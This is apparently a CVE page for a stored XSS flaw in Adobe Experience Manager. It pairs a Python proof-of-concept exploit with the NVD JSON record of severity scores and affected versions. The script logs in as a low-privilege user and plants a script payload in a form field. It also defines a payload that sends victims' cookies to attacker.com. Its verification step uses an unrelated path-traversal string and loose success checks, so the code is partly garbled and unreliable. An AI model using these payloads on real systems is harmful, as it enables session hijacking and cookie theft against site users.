CVE-2025-64614

import requests import json # CVE-2025-64614 PoC - Adobe Experience Manager Stored XSS # Target: Adobe Experience Manager < 6.5.24 target_url = "https://<aem-host>/content/forms/af/<form-path>.html" login_url = "https://<aem-host>/libs/granite/core/content/login.html" form_submit_url = "https://<aem-host>/content/forms/af/<form-path>/jcr:content/guideContainer.af.submit.jsp" # XSS Payload - Stored in form field xss_payload = '<script>alert(document.cookie)</script>' event_handler_payload = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>' session = requests.Session() # Step 1: Login to AEM with low-privileged account login_data = { '_charset_': 'utf-8', 'j_username': '<low-privilege-user>', 'j_password': '<password>', 'validate': '' } response = session.post(login_url, data=login_data) # Step 2: Submit form with malicious XSS payload form_data = { 'textField': xss_payload, # Inject XSS into vulnerable field ':operation': 'granite:formSubmit' } response = session.post(form_submit_url, data=form_data) # Step 3: Verify stored XSS - Victim visits the page verify_url = f"{target_url}?item=../../.." response = session.get(verify_url) if xss_payload in response.text or 'script' in response.text.lower(): print('[+] XSS payload successfully stored!') print('[+] PoC executed successfully') else: print('[-] XSS may not be reflected or payload was sanitized')

{"cve": {"id": "CVE-2025-64614", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:26.087", "lastModified": "2025-12-12T17:39:19.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}